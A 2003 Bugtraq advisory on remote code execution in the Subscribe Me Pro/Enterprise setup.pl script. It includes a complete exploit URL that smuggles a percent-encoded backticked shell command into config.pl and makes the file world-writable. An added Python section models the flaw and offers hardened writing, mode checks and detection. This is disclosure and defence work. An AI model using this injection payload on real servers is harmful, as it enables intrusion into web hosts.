Bugtraq mailing list archives

Subscribe Me Pro/Enterprise - Remote Code Execution via Backticked Perl Variable Injection.


From: "Paul Craig - Pimp Industries" <headpimp () pimp-industries com>
Date: Fri, 19 Dec 2003 12:22:22 +1300 (NZDT)


                Pimp industries.
                        "Its all about the Bling, Bitches and Fame!"


        Subscribe Me Pro/Enterprise (All recent versions of Pro/Enterprise)
        Remote Code Execution via Backticked Perl Variable Injection.
                        (C) Paul Craig
                                Pimp Industries 2003
This advisory is also online at: http://www.pimp-industries.com/pimp-0003.txt


Background
-------------
Subscribe Me Pro/Enterprise is a mailing list management script developed
by siteinteractive (http://www.siteinteractive.com).
Several flaws exist in setup.pl. Together they let an attacker inject shell
commands into config.pl through a backticked Perl variable injection flaw,
then use a second flaw to have config.pl written with permissions of 777,
and finally run the injected shell commands by requesting config.pl.


Exploit:
------------
This attack fools setup.pl into thinking that you have just installed
Subscribe Me and wish to set it up.
While doing so, setup.pl writes all of your configuration variables into
config.pl as Perl source.
setup.pl does some input validation, but it is easily bypassed by hex
(percent) encoding the data you send; the decoded value still ends up in
config.pl unchanged.

Run-through of the exploit:

First we connect and inject our exploit command of '/usr/bin/id > id'
(hex encoded in the notification parameter) and tell setup.pl to create all
files with a mode of 777:
http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

This returns a page saying "Please set your administration password"
(you won't be able to).

setup.pl has now written the following line to config.pl (note the backticks,
which Perl runs as a shell command when the line is evaluated):
$notification = "" .`/usr/bin/id > id`  . "";
config.pl is also now set to -rwxrwxrwx.
Next we request http://victim.com/cgi-bin/config.pl so the web server runs our Perl.

As a result http://victim.com/cgi-bin/id is created, containing the command's output:

uid=48(apache) gid=48(apache) groups=48(apache)

Using this technique it is possible to run any system command as the web
server user. That's bad, very.
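The steps above, modelled as an added example in Python (a stand-in, not the vendor's Perl and not code from this advisory). The advisory does not show setup.pl's config writer, so vulnerable_config_line() is an assumed minimal shape that produces exactly the line quoted above; safe_config_line(), safe_mode() and is_plain_assignment() are suggested fixes and a responder's check, not the vendor's code. The RAW_NOTIFICATION value is constructed from the exploit URL.

```python
import re
import urllib.parse

# Constructed from the advisory: the notification= value exactly as it appears in the
# exploit URL, before the CGI layer percent-decodes it.
RAW_NOTIFICATION = '"%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`%20."'


def decode_param(raw):
    """Percent-decode a CGI parameter, as the CGI layer does before setup.pl sees it."""
    return urllib.parse.unquote(raw)


def vulnerable_config_line(name, value):
    """Assumed shape of what setup.pl does: interpolate the value straight into Perl
    source between double quotes. A value that closes the quote turns the rest into code."""
    return f'${name} = "{value}";'


def perl_single_quoted(value):
    """Render a value as a Perl single-quoted literal. Inside '...' only backslash and
    the quote itself are special, so backticks, $ and @ stay plain text."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def safe_config_line(name, value):
    """Hardened writer (suggested, not the vendor's): validated variable name,
    single-quoted and escaped value."""
    if not re.fullmatch(r"[A-Za-z_]\w*", name):
        raise ValueError(f"bad variable name: {name!r}")
    return f"${name} = {perl_single_quoted(value)};"


def safe_mode(requested):
    """Accept a requested octal mode for config.pl but refuse group/world-writable ones,
    which blocks the permissions=777 step of the exploit."""
    mode = int(requested, 8)
    if mode & 0o022:
        raise ValueError(f"refusing mode {requested}: config.pl must not be writable by others")
    return mode


# Matches a config line whose right-hand side is a single quoted literal and nothing else.
PLAIN_ASSIGNMENT = re.compile(
    r"""^\$\w+ = (?:'(?:[^'\\]|\\.)*'|"(?:[^"\\$@`]|\\.)*");$"""
)


def is_plain_assignment(line):
    """Responder's check over an existing config.pl: flag any line that is not a simple
    quoted assignment, e.g. one carrying a concatenated backtick expression."""
    return PLAIN_ASSIGNMENT.match(line) is not None


if __name__ == "__main__":
    decoded = decode_param(RAW_NOTIFICATION)
    bad = vulnerable_config_line("notification", decoded)
    good = safe_config_line("notification", decoded)
    print("decoded value :", decoded)
    print("vulnerable    :", bad, "| plain assignment:", is_plain_assignment(bad))
    print("hardened      :", good, "| plain assignment:", is_plain_assignment(good))
    for mode in ("644", "777"):
        try:
            print(f"mode {mode} ->", oct(safe_mode(mode)))
        except ValueError as err:
            print(err)
```

The fix is not to filter the raw parameter (the encoded form sails past any such check, as the advisory shows) but to stop treating configuration values as Perl source: single-quoting with escaping makes the backticks inert, and refusing writable modes removes the second flaw the exploit chains. The is_plain_assignment() check can be run line by line over a deployed config.pl to spot an already injected entry.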


Company Status:
-------------
The company was contacted via email (support@) on Monday 15th December; they
were notified that the exploit would be released on the 19th of December,
and they were told how to fix the problem.
No reply came back from the company, and no official fix has been
released.


Suggestions/Work Around:
-------------
Remove setup.pl once installation is complete, and make config.pl read-only
(e.g. chmod 444). Bear in mind that a file owned by the account the web server
runs as can be made writable again by any script running as that account, so
config.pl should ideally be owned by a different user.


About Pimp Industries
---------------
Pimp Industries is a privately owned security research company. If you are
interested in having any code auditing work done, or would like to contact
Pimp Industries to discuss any nature of business, please email us at
headpimp () pimp-industries com.


Big Hellos to
-------------
Pinky, Kimathy, sozni, hx, decx and Santa (I've been really really good).


Paul Craig
Head Pimp, Security Researcher
Pimp Industries


